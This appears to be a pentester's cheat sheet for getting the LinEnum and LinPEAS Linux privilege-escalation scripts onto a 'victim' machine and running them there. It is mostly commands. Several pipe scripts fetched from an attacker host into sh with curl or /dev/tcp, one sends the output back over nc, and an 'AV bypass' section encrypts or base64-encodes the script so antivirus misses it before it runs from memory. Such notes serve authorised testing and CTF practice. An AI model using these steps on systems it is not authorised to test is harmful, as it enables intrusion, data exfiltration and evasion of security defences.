LinEnum script (Simple):

:LiGithub: https://github.com/rebootuser/LinEnum

You can use any way to send this script to the TARGET. the easiest one is to copy it and paste it in a file in the /tmp folder as: script.sh or anything

After you transfer the script to the target give it execute permission: chmod +x <script_name.sh>

Then just run it and wait....

---

LinPEAS script (Advance):

:LiGithub: https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS

https://blog.cyberethical.me/linpeas

Differences between linpeas_fat.sh, linpeas.sh and linpeas_small.sh:

• linpeas_fat.sh: Contains all checks, even third party applications in base64 embedded.
• linpeas.sh: Contains all checks, but only the third party application linux exploit suggester is embedded. This is the default linpeas.sh.
• linpeas_small.sh: Contains only the most important checks making its size smaller.

https://github.com/peass-ng/PEASS-ng/releases/download/20250518-5781f7e5/linpeas.sh

Quick Start

Find the latest versions of all the scripts and binaries in the releases page.

# From public github
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh

# Local network
sudo python3 -m http.server 80 #Host
curl 10.10.10.10/linpeas.sh | sh #Victim

# Without curl
sudo nc -q 5 -lvnp 80 < linpeas.sh #Host
cat < /dev/tcp/10.10.10.10/80 | sh #Victim

# Excute from memory and send output back to the host
nc -lvnp 9002 | tee linpeas.out #Host
curl 10.10.14.20:8000/linpeas.sh | sh | nc 10.10.14.20 9002 #Victim

# Output to file
./linpeas.sh -a > /dev/shm/linpeas.txt #Victim
less -r /dev/shm/linpeas.txt #Read with colors

# Use a linpeas binary
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas_linux_amd64
chmod +x linpeas_linux_amd64
./linpeas_linux_amd64

AV bypass

#open-ssl encryption
openssl enc -aes-256-cbc -pbkdf2 -salt -pass pass:AVBypassWithAES -in linpeas.sh -out lp.enc
sudo python -m SimpleHTTPServer 80 #Start HTTP server
curl 10.10.10.10/lp.enc | openssl enc -aes-256-cbc -pbkdf2 -d -pass pass:AVBypassWithAES | sh #Download from the victim

#Base64 encoded
base64 -w0 linpeas.sh > lp.enc
sudo python -m SimpleHTTPServer 80 #Start HTTP server
curl 10.10.10.10/lp.enc | base64 -d | sh #Download from the victim